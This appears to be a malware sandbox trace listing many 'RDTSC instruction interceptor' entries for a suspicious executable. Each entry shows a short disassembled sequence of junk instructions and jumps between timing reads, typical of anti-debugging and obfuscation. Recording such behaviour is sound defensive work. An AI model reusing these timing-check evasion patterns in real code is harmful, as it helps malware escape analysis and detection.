Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E849 second address: 93E86F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F28C4758090h 0x00000008 jmp 00007F28C4758084h 0x0000000d je 00007F28C4758076h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E86F second address: 93E875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E875 second address: 93E879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E879 second address: 93E88B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F28C47EE2B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E9A8 second address: 93E9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F28C4758076h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E9B2 second address: 93E9B8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E9B8 second address: 93E9BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E9BD second address: 93E9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E9CE second address: 93E9D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93E9D4 second address: 93E9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93F109 second address: 93F12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C4758081h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 jo 00007F28C475807Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9410C7 second address: 9410CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9412DC second address: 9412E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9412E0 second address: 9412F2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F28C47EE2B6h 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9412F2 second address: 9412F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 941BA4 second address: 941BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 941BA9 second address: 941BAE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 941BAE second address: 941BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jne 00007F28C47EE2B6h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 941BC3 second address: 941BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 942124 second address: 94212E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 942644 second address: 942660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F28C4758076h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jnp 00007F28C4758078h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 942660 second address: 942664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 942664 second address: 9426D2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F28C4758078h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+122D27EBh], edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F28C4758078h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 xor dword ptr [ebp+122D2283h], ebx 0x0000004c xchg eax, ebx 0x0000004d pushad 0x0000004e push esi 0x0000004f jnc 00007F28C4758076h 0x00000055 pop esi 0x00000056 jg 00007F28C475807Ch 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9426D2 second address: 9426D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94304C second address: 943050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 943050 second address: 943071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F28C47EE2B6h 0x00000011 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 944036 second address: 94403B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94403B second address: 944041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 944BD7 second address: 944BDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 944BDC second address: 944BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 946A65 second address: 946A74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9474FA second address: 94750B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007F28C47EE2BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9475B4 second address: 9475C6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9475C6 second address: 9475CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94A635 second address: 94A63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94A63E second address: 94A642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94A642 second address: 94A646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94CB56 second address: 94CB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9437FE second address: 943804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951A0A second address: 951A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951A0E second address: 951A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951A14 second address: 951A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F28C47EE2BCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951A27 second address: 951A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951A2B second address: 951A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 952C39 second address: 952C4B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 952C4B second address: 952C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94491E second address: 944927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 944927 second address: 94492B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9579E5 second address: 9579EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 957A76 second address: 957A80 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9598E0 second address: 959950 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007F28C4758076h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007F28C4758081h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F28C4758078h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 and ebx, dword ptr [ebp+122D3A64h] 0x00000036 mov ebx, eax 0x00000038 push 00000000h 0x0000003a or dword ptr [ebp+122D2F41h], ebx 0x00000040 pushad 0x00000041 push edx 0x00000042 jnc 00007F28C4758076h 0x00000048 pop edi 0x00000049 xor dword ptr [ebp+122D3468h], edi 0x0000004f popad 0x00000050 xchg eax, esi 0x00000051 js 00007F28C4758084h 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9453F3 second address: 9453F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 945E1E second address: 945E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F28C475807Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9467FB second address: 946801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 946801 second address: 946805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94723A second address: 947244 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F28C47EE2BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94ADFC second address: 94AE02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94AE02 second address: 94AE06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94CC87 second address: 94CC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94CC8B second address: 94CCBB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F28C47EE2BDh 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F28C47EE2C1h 0x0000001c rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 94EC40 second address: 94EC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 950BA8 second address: 950BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951C60 second address: 951D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnl 00007F28C4758082h 0x00000011 nop 0x00000012 mov dword ptr [ebp+122D20FAh], esi 0x00000018 push dword ptr fs:[00000000h] 0x0000001f add bh, 00000000h 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F28C4758078h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov dword ptr [ebp+124568C3h], eax 0x00000049 mov ebx, dword ptr [ebp+122D1C88h] 0x0000004f mov eax, dword ptr [ebp+122D0FFDh] 0x00000055 mov ebx, dword ptr [ebp+122D32CCh] 0x0000005b push FFFFFFFFh 0x0000005d jne 00007F28C4758082h 0x00000063 mov ebx, esi 0x00000065 nop 0x00000066 jo 00007F28C4758084h 0x0000006c pushad 0x0000006d jne 00007F28C4758076h 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951D00 second address: 951D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jl 00007F28C47EE2C8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951D10 second address: 951D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 951D14 second address: 951D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 952D9D second address: 952DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 8F5FD4 second address: 8F5FEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9613CE second address: 9613D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 961528 second address: 961532 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 961532 second address: 961538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96166D second address: 961671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 961671 second address: 961684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F28C4758076h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 966AA7 second address: 966AAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 966AAB second address: 966AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 966AB1 second address: 966ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F28C47EE2B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 966CB1 second address: 966CB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 966CB5 second address: 966CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 966CBB second address: 966CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 966CC1 second address: 966CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 952DA1 second address: 952DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 952DA7 second address: 952DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E5B1 second address: 96E5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F28C4758087h 0x0000000b popad 0x0000000c jnl 00007F28C475807Ch 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E5DB second address: 96E5E0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96D86A second address: 96D870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96D870 second address: 96D87A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F28C47EE2B6h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96D9D9 second address: 96DA0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnl 00007F28C4758076h 0x00000011 jmp 00007F28C475807Bh 0x00000016 jmp 00007F28C4758081h 0x0000001b popad 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96DA0B second address: 96DA11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96DA11 second address: 96DA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E014 second address: 96E01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E01A second address: 96E02A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F28C4758076h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E02A second address: 96E051 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F28C47EE2B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007F28C47EE2C6h 0x00000012 popad 0x00000013 pushad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E051 second address: 96E059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
